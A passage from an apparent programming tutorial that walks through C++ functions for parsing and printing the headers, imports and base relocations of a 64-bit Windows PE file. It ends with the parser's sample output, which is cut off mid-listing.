		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

Here’s the full function:

void PE64FILE::ParseRichHeader() {
	
	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] == 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

}

PrintRichHeaderInfo()

This function iterates over each entry in PEFILE_RICH_HEADER and prints its value.

void PE64FILE::PrintRichHeaderInfo() {
	
	printf(" RICH HEADER:\n");
	printf(" ------------\n\n");

	for (int i = 0; i < PEFILE_RICH_HEADER_INFO.entries; i++) {
		printf(" 0x%X 0x%X 0x%X: %d.%d.%d\n",
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount,
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount);
	}

}


Parsing NT Headers

ParseNTHeaders()

Similar to the DOS Header, all we need to do is read a number of bytes equal to the size of IMAGE_NT_HEADERS starting from e_lfanew.

After that we can parse out the contents of the File Header and the Optional Header.

The Optional Header contains an array of IMAGE_DATA_DIRECTORY structures, which we care about.
To parse out this information, we can use the IMAGE_DIRECTORY_ENTRY_[...] constants defined in winnt.h as array indexes to access the corresponding IMAGE_DATA_DIRECTORY structure of each Data Directory.

void PE64FILE::ParseNTHeaders() {
	
	fseek(Ppefile, PEFILE_DOS_HEADER.e_lfanew, SEEK_SET);
	fread(&PEFILE_NT_HEADERS, sizeof(PEFILE_NT_HEADERS), 1, Ppefile);

	PEFILE_NT_HEADERS_SIGNATURE = PEFILE_NT_HEADERS.Signature;

	PEFILE_NT_HEADERS_FILE_HEADER_MACHINE = PEFILE_NT_HEADERS.FileHeader.Machine;
	PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS = PEFILE_NT_HEADERS.FileHeader.NumberOfSections;
	PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER = PEFILE_NT_HEADERS.FileHeader.SizeOfOptionalHeader;

	PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC = PEFILE_NT_HEADERS.OptionalHeader.Magic;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfInitializedData;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfUninitializedData;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT = PEFILE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.BaseOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE = PEFILE_NT_HEADERS.OptionalHeader.ImageBase;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.SectionAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT = PEFILE_NT_HEADERS.OptionalHeader.FileAlignment;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfImage;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS = PEFILE_NT_HEADERS.OptionalHeader.SizeOfHeaders;

	PEFILE_EXPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXPORT];
	PEFILE_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IMPORT];
	PEFILE_RESOURCE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_RESOURCE];
	PEFILE_EXCEPTION_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_EXCEPTION];
	PEFILE_SECURITY_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_SECURITY];
	PEFILE_BASERELOC_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BASERELOC];
	PEFILE_DEBUG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DEBUG];
	PEFILE_ARCHITECTURE_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE];
	PEFILE_GLOBALPTR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_GLOBALPTR];
	PEFILE_TLS_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_TLS];
	PEFILE_LOAD_CONFIG_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG];
	PEFILE_BOUND_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT];
	PEFILE_IAT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_IAT];
	PEFILE_DELAY_IMPORT_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];
	PEFILE_COM_DESCRIPTOR_DIRECTORY = PEFILE_NT_HEADERS.OptionalHeader.DataDirectory[___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];

}

PrintNTHeadersInfo()

This function prints the data obtained from the File Header and the Optional Header, and for each Data Directory it prints its RVA and size.

void PE64FILE::PrintNTHeadersInfo() {
	
	printf(" NT HEADERS:\n");
	printf(" -----------\n\n");

	printf(" PE Signature: 0x%X\n", PEFILE_NT_HEADERS_SIGNATURE);

	printf("\n File Header:\n\n");
	printf("   Machine: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_MACHINE);
	printf("   Number of sections: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS);
	printf("   Size of optional header: 0x%X\n", PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER);

	printf("\n Optional Header:\n\n");
	printf("   Magic: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC);
	printf("   Size of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE);
	printf("   Size of initialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA);
	printf("   Size of uninitialized data: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA);
	printf("   Address of entry point: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT);
	printf("   RVA of start of code section: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE);
	printf("   Desired image base: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE);
	printf("   Section alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT);
	printf("   File alignment: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT);
	printf("   Size of image: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE);
	printf("   Size of headers: 0x%X\n", PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS);

	printf("\n Data Directories:\n");
	printf("\n   * Export Directory:\n");
	printf("       RVA: 0x%X\n", PEFILE_EXPORT_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_EXPORT_DIRECTORY.Size);
	.
	.
	[REDACTED]
	.
	.
	printf("\n   * COM Runtime Descriptor:\n");
	printf("       RVA: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.VirtualAddress);
	printf("       Size: 0x%X\n", PEFILE_COM_DESCRIPTOR_DIRECTORY.Size);

}


Parsing Section Headers

ParseSectionHeaders()

This function starts by pointing the PEFILE_SECTION_HEADERS class member to a newly allocated IMAGE_SECTION_HEADER array with PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS elements.

Then it goes into a loop of PEFILE_NT_HEADERS_FILE_HEADER_NUMBEROF_SECTIONS iterations. In each iteration it sets the file offset to (e_lfanew + size of NT Headers + loop counter multiplied by the size of a Section Header) to reach the beginning of the next Section Header, then it reads that Section Header and assigns it to the next element of PEFILE_SECTION_HEADERS.

void PE64FILE::ParseSectionHeaders() {
	
	PEFILE_SECTION_HEADERS = new ___IMAGE_SECTION_HEADER[PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS];
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		int offset = (PEFILE_DOS_HEADER.e_lfanew + sizeof(PEFILE_NT_HEADERS)) + (i * ___IMAGE_SIZEOF_SECTION_HEADER);
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_SECTION_HEADERS[i], ___IMAGE_SIZEOF_SECTION_HEADER, 1, Ppefile);
	}

}

PrintSectionHeadersInfo()

This function loops over the Section Headers array (filled by ParseSectionHeaders()), and it prints information about each section.

void PE64FILE::PrintSectionHeadersInfo() {
	
	printf(" SECTION HEADERS:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		printf("   * %.8s:\n", PEFILE_SECTION_HEADERS[i].Name);
		printf("        VirtualAddress: 0x%X\n", PEFILE_SECTION_HEADERS[i].VirtualAddress);
		printf("        VirtualSize: 0x%X\n", PEFILE_SECTION_HEADERS[i].Misc.VirtualSize);
		printf("        PointerToRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].PointerToRawData);
		printf("        SizeOfRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].SizeOfRawData);
		printf("        Characteristics: 0x%X\n\n", PEFILE_SECTION_HEADERS[i].Characteristics);
	}

}


Parsing Imports

ParseImportDirectory()

To parse out the Import Directory Table we need to determine the count of IMAGE_IMPORT_DESCRIPTORs first.

This function starts by resolving the file offset of the Import Directory, then it goes into a loop where each iteration reads the next import descriptor.
In each iteration it checks whether the descriptor has zeroed-out values; if that’s the case, we’ve reached the end of the Import Directory, so the loop breaks.
Otherwise it increments _import_directory_count and the loop continues.

After finding the size of the Import Directory, the function points the PEFILE_IMPORT_TABLE class member to a newly allocated IMAGE_IMPORT_DESCRIPTOR array with _import_directory_count elements, then goes into another loop similar to the one we’ve seen in ParseSectionHeaders() to parse out the import descriptors.

void PE64FILE::ParseImportDirectory() {
	
	DWORD _import_directory_address = resolve(PEFILE_IMPORT_DIRECTORY.VirtualAddress, locate(PEFILE_IMPORT_DIRECTORY.VirtualAddress));
	_import_directory_count = 0;

	while (true) {
		___IMAGE_IMPORT_DESCRIPTOR tmp;
		int offset = (_import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);

		if (tmp.Name == 0x00000000 && tmp.FirstThunk == 0x00000000) {
			_import_directory_count -= 1;
			_import_directory_size = _import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR);
			break;
		}

		_import_directory_count++;
	}

	PEFILE_IMPORT_TABLE = new ___IMAGE_IMPORT_DESCRIPTOR[_import_directory_count];

	for (int i = 0; i < _import_directory_count; i++) {
		int offset = (i * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_IMPORT_TABLE[i], sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);
	}

}

PrintImportTableInfo()

After obtaining the import descriptors, further parsing is needed to retrieve information about the imported functions.
This is done by the PrintImportTableInfo() function.

This function iterates over the import descriptors. For each descriptor it resolves the file offset of the DLL name, retrieves the name and prints it; it also prints the ILT RVA, the IAT RVA and whether the import is bound or not.

After that it resolves the file offset of the ILT then it parses out each ILT entry.
If the Ordinal/Name flag is set it prints the function ordinal, otherwise it prints the function name, the hint RVA and the hint.

If the ILT entry is zeroed out, the loop breaks and the next import descriptor parsing iteration starts.

We’ve discussed the details about this in the PE imports post.

void PE64FILE::PrintImportTableInfo() {
	
	printf(" IMPORT TABLE:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < _import_directory_count; i++) {
		DWORD NameAddr = resolve(PEFILE_IMPORT_TABLE[i].Name, locate(PEFILE_IMPORT_TABLE[i].Name));
		int NameSize = 0;

		while (true) {
			char tmp;
			fseek(Ppefile, (NameAddr + NameSize), SEEK_SET);
			fread(&tmp, sizeof(char), 1, Ppefile);

			if (tmp == 0x00) {
				break;
			}

			NameSize++;
		}

		char* Name = new char[NameSize + 2];
		fseek(Ppefile, NameAddr, SEEK_SET);
		fread(Name, (NameSize * sizeof(char)) + 1, 1, Ppefile);
		printf("   * %s:\n", Name);
		delete[] Name;

		printf("       ILT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk);
		printf("       IAT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].FirstThunk);

		if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == 0) {
			printf("       Bound: FALSE\n");
		}
		else if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == -1) {
			printf("       Bound: TRUE\n");
		}

		printf("\n");

		DWORD ILTAddr = resolve(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk, locate(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk));
		int entrycounter = 0;

		while (true) {

			ILT_ENTRY_64 entry;

			fseek(Ppefile, (ILTAddr + (entrycounter * sizeof(QWORD))), SEEK_SET);
			fread(&entry, sizeof(ILT_ENTRY_64), 1, Ppefile);

			BYTE flag = entry.ORDINAL_NAME_FLAG;
			DWORD HintRVA = 0x0;
			WORD ordinal = 0x0;

			if (flag == 0x0) {
				HintRVA = entry.FIELD_2.HINT_NAME_TABE;
			}
			else if (flag == 0x01) {
				ordinal = entry.FIELD_2.ORDINAL;
			}

			if (flag == 0x0 && HintRVA == 0x0 && ordinal == 0x0) {
				break;
			}

			printf("\n       Entry:\n");

			if (flag == 0x0) {
				___IMAGE_IMPORT_BY_NAME hint;

				DWORD HintAddr = resolve(HintRVA, locate(HintRVA));
				fseek(Ppefile, HintAddr, SEEK_SET);
				fread(&hint, sizeof(___IMAGE_IMPORT_BY_NAME), 1, Ppefile);
				printf("         Name: %s\n", hint.Name);
				printf("         Hint RVA: 0x%X\n", HintRVA);
				printf("         Hint: 0x%X\n", hint.Hint);
			}
			else if (flag == 1) {
				printf("         Ordinal: 0x%X\n", ordinal);
			}

			entrycounter++;
		}

		printf("\n   ----------------------\n\n");

	}

}


Parsing Base Relocations

ParseBaseReloc()

This function follows the same process we’ve seen in ParseImportDirectory().
It resolves the file offset of the Base Relocation Directory, then it loops over each relocation block until it reaches a zeroed-out block. Then it parses out these blocks and saves each IMAGE_BASE_RELOCATION structure in PEFILE_BASERELOC_TABLE.
One thing that’s different here from what we’ve seen in ParseImportDirectory() is that in addition to keeping a block counter, we also keep a size counter that’s incremented by the value of SizeOfBlock of each block in each iteration.
We do this because relocation blocks don’t have a fixed size, and in order to correctly calculate the offset of the next relocation block we need the total size of the previous blocks.

void PE64FILE::ParseBaseReloc() {
	
	DWORD _basereloc_directory_address = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
	_basreloc_directory_count = 0;
	int _basereloc_size_counter = 0;

	while (true) {
		___IMAGE_BASE_RELOCATION tmp;

		int offset = (_basereloc_size_counter + _basereloc_directory_address);

		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);

		if (tmp.VirtualAddress == 0x00000000 &&
			tmp.SizeOfBlock == 0x00000000) {
			break;
		}

		_basreloc_directory_count++;
		_basereloc_size_counter += tmp.SizeOfBlock;
	}

	PEFILE_BASERELOC_TABLE = new ___IMAGE_BASE_RELOCATION[_basreloc_directory_count];

	_basereloc_size_counter = 0;

	for (int i = 0; i < _basreloc_directory_count; i++) {
		int offset = _basereloc_directory_address + _basereloc_size_counter;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_BASERELOC_TABLE[i], sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);
		_basereloc_size_counter += PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
	}

}

PrintBaseRelocationsInfo()

This function iterates over the base relocation blocks. For each block it resolves the block’s file offset, then prints the block’s page RVA, size and number of entries (calculated by subtracting the size of IMAGE_BASE_RELOCATION from the block size, then dividing that by the size of a WORD).
After that it iterates over the relocation entries and prints each entry’s value, then separates the type and the offset out of that value and prints each of them.

We’ve discussed the details about this in the PE base relocations post.

void PE64FILE::PrintBaseRelocationsInfo() {
	
	printf(" BASE RELOCATIONS TABLE:\n");
	printf(" -----------------------\n");

	int szCounter = sizeof(___IMAGE_BASE_RELOCATION);

	for (int i = 0; i < _basreloc_directory_count; i++) {

		DWORD PAGERVA, BLOCKSIZE, BASE_RELOC_ADDR;
		int ENTRIES;

		BASE_RELOC_ADDR = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
		PAGERVA = PEFILE_BASERELOC_TABLE[i].VirtualAddress;
		BLOCKSIZE = PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
		ENTRIES = (BLOCKSIZE - sizeof(___IMAGE_BASE_RELOCATION)) / sizeof(WORD);

		printf("\n   Block 0x%X: \n", i);
		printf("     Page RVA: 0x%X\n", PAGERVA);
		printf("     Block size: 0x%X\n", BLOCKSIZE);
		printf("     Number of entries: 0x%X\n", ENTRIES);
		printf("\n     Entries:\n");

		for (int i = 0; i < ENTRIES; i++) {

			BASE_RELOC_ENTRY entry;

			int offset = (BASE_RELOC_ADDR + szCounter + (i * sizeof(WORD)));

			fseek(Ppefile, offset, SEEK_SET);
			fread(&entry, sizeof(WORD), 1, Ppefile);

			printf("\n       * Value: 0x%X\n", entry);
			printf("         Relocation Type: 0x%X\n", entry.TYPE);
			printf("         Offset: 0x%X\n", entry.OFFSET);

		}
		printf("\n   ----------------------\n\n");
		szCounter += BLOCKSIZE;
	}

}


Conclusion

Here’s the full output after running the parser on a file:

Desktop>.\PE-Parser.exe .\SimpleApp64.exe


 FILE: .\SimpleApp64.exe
 TYPE: 0x20B (PE32+)

 ----------------------------------

 DOS HEADER:
 -----------

 Magic: 0x5A4D
 File address of new exe header: 0x100

 ----------------------------------

 RICH HEADER:
 ------------

 0x7809 0x93 0xA: 30729.147.10
 0x6FCB 0x101 0x2: 28619.257.2
 0x6FCB 0x105 0x11: 28619.261.17
 0x6FCB 0x104 0xA: 28619.260.10
 0x6FCB 0x103 0x3: 28619.259.3
 0x685B 0x101 0x5: 26715.257.5
 0x0 0x1 0x30: 0.1.48
 0x7086 0x109 0x1: 28806.265.1
 0x7086 0xFF 0x1: 28806.255.1
 0x7086 0x102 0x1: 28806.258.1

 ----------------------------------

 NT HEADERS:
 -----------

 PE Signature: 0x4550

 File Header:

   Machine: 0x8664
   Number of sections: 0x6
   Size of optional header: 0xF0

 Optional Header:

   Magic: 0x20B
   Size of code section: 0xE00
   Size of initialized data: 0x1E00
   Size of uninitialized data: 0x0
   Address of entry point: 0x12C4
   RVA of start of code section: 0x1000
   Desired image base: 0x40000000
   Section alignment: 0x1000
   File alignment: 0x200
   Size of image: 0x7000
   Size of headers: 0x400

 Data Directories:

   * Export Directory:
       RVA: 0x0
       Size: 0x0

   * Import Directory:
       RVA: 0x27AC
       Size: 0xB4

   * Resource Directory:
       RVA: 0x5000
       Size: 0x1E0

   * Exception Directory:
       RVA: 0x4000
       Size: 0x168

   * Security Directory:
       RVA: 0x0
       Size: 0x0

   * Base Relocation Table:
       RVA: 0x6000
       Size: 0x28

   * Debug Directory:
       RVA: 0x2248
       Size: 0x70

   * Architecture Specific Data:
       RVA: 0x0
       Size: 0x0

   * RVA of GlobalPtr:
       RVA: 0x0
       Size: 0x0

   * TLS Directory:
       RVA: 0x0
       Size: 0x0

   * Load Configuration Directory:
       RVA: 0x22C0
       Size: 0x130

   * Bound Import Directory:
       RVA: 0x0
       Size: 0x0

   * Import Address Table:
       RVA: 0x2000
       Size: 0x198

   * Delay Load Import Descriptors:
       RVA: 0x0
       Size: 0x0

   * COM Runtime Descriptor:
       RVA: 0x0
       Size: 0x0

 ----------------------------------

 SECTION HEADERS:
 ----------------

   * .text:
        VirtualAddress: 0x1000
        VirtualSize: 0xD2C
        PointerToRawData: 0x400
        SizeOfRawData: 0xE00
        Characteristics: 0x60000020

   * .rdata:
        VirtualAddress: 0x2000
        VirtualSize: 0xE3C
        PointerToRawData: 0x1200
        SizeOfRawData: 0x1000
        Characteristics: 0x40000040

   * .data:
        VirtualAddress: 0x3000
        VirtualSize: 0x638
        PointerToRawData: 0x2200
        SizeOfRawData: 0x200
        Characteristics: 0xC0000040

   * .pdata:
        VirtualAddress: 0x4000
        VirtualSize: 0x168
        PointerToRawData: 0x2400
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .rsrc:
        VirtualAddress: 0x5000
        VirtualSize: 0x1E0
        PointerToRawData: 0x2600
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .reloc:
        VirtualAddress: 0x6000
        VirtualSize: 0x28
        PointerToRawData: 0x2800
        SizeOfRawData: 0x200
        Characteristics: 0x42000040


 ----------------------------------

 IMPORT TABLE:
 ----------------

   * USER32.dll:
       ILT RVA: 0x28E0
       IAT RVA: 0x2080
       Bound: FALSE


       Entry:
         Name: MessageBoxA
         Hint RVA: 0x29F8
         Hint: 0x283

   ----------------------

   * VCRUNTIME140.dll:
       ILT RVA: 0x28F0
       IAT RVA: 0x2090
       Bound: FALSE


       Entry:
         Name: memset
         Hint RVA: 0x2A5E
         Hint: 0x3E

       Entry:
         Name: __current_exception_context
         Hint RVA: 0x2A40
         Hint: 0x1C

       Entry:
         Name: __current_exception
         Hint RVA: 0x2A2A
         Hint: 0x1B

       Entry:
         Name: __C_specific_handler
         Hint RVA: 0x2A12
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-runtime-l1-1-0.dll:
       ILT RVA: 0x2948
       IAT RVA: 0x20E8
       Bound: FALSE


       Entry:
         Name: _crt_atexit
         Hint RVA: 0x2C12
         Hint: 0x1E

       Entry:
         Name: terminate
         Hint RVA: 0x2C20
         Hint: 0x67

       Entry:
         Name: _exit
         Hint RVA: 0x2B30
         Hint: 0x23

       Entry:
         Name: _register_thread_local_exe_atexit_callback
         Hint RVA: 0x2B76
         Hint: 0x3D

       Entry:
         Name: _c_exit
         Hint RVA: 0x2B6C
         Hint: 0x15

       Entry:
         Name: exit
         Hint RVA: 0x2B28
         Hint: 0x55

       Entry:
         Name: _initterm_e
         Hint RVA: 0x2B1A
         Hint: 0x37

       Entry:
         Name: _initterm
         Hint RVA: 0x2B0E
         Hint: 0x36

       Entry:
         Name: _get_initial_narrow_environment
         Hint RVA: 0x2AEC
         Hint: 0x28

       Entry:
         Name: _initialize_narrow_environment
         Hint RVA: 0x2ACA
         Hint: 0x33

       Entry:
         Name: _configure_narrow_argv
         Hint RVA: 0x2AB0
         Hint: 0x18

       Entry:
         Name: _initialize_onexit_table
         Hint RVA: 0x2BDA
         Hint: 0x34

       Entry:
         Name: _set_app_type
         Hint RVA: 0x2A8C
         Hint: 0x42

       Entry:
         Name: _seh_filter_exe
         Hint RVA: 0x2A7A
         Hint: 0x40

       Entry:
         Name: _cexit
         Hint RVA: 0x2B62
         Hint: 0x16

       Entry:
         Name: __p___argv
         Hint RVA: 0x2B54
         Hint: 0x5

       Entry:
         Name: __p___argc
         Hint RVA: 0x2B46
         Hint: 0x4

       Entry:
         Name: _register_onexit_function
         Hint RVA: 0x2BF6
         Hint: 0x3C

   ----------------------

   * api-ms-win-crt-math-l1-1-0.dll:
       ILT RVA: 0x2938
       IAT RVA: 0x20D8
       Bound: FALSE


       Entry:
         Name: __setusermatherr
         Hint RVA: 0x2A9C
         Hint: 0x9

   ----------------------

   * api-ms-win-crt-stdio-l1-1-0.dll:
       ILT RVA: 0x29E0
       IAT RVA: 0x2180
       Bound: FALSE


       Entry:
         Name: __p__commode
         Hint RVA: 0x2BCA
         Hint: 0x1

       Entry:
         Name: _set_fmode
         Hint RVA: 0x2B38
         Hint: 0x54

   ----------------------

   * api-ms-win-crt-locale-l1-1-0.dll:
       ILT RVA: 0x2928
       IAT RVA: 0x20C8
       Bound: FALSE


       Entry:
         Name: _configthreadlocale
         Hint RVA: 0x2BA4
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-heap-l1-1-0.dll:
       ILT RVA: 0x2918
       IAT RVA: 0x20B8
       Bound: FALSE


       Entry:
         Name: _set_new_mode
         Hint RVA: 0x2BBA
         Hint: 0x16

   ----------------------


 ----------------------------------

 BASE RELOCATIONS TABLE:
 -----------------------

   Block 0x0:
     Page RVA: 0x2000
     Block size: 0x28
     Number of entries: 0x10

     Entries:

       * Value: 0xA198
         Relocation Type: 0xA
         Offset: 0x198

       * Value: 0xA1A0
         Relocation Type: 0xA
         Offset: 0x1A0

       * Value: 0xA1A8
         Relocation Type: 0xA
         Offset: 0x1A8

       * Value: 0xA1B0
         Relocation Type: 0xA
         Offset: 0x1B0

       * Value: 0xA1B8
         Relocation Type: 0xA
         Offset: 0x1B8

       * Value: 0xA1C8
         Relocation Type: 0xA
         Offset: 0x1C8

       * Value: 0xA1E0
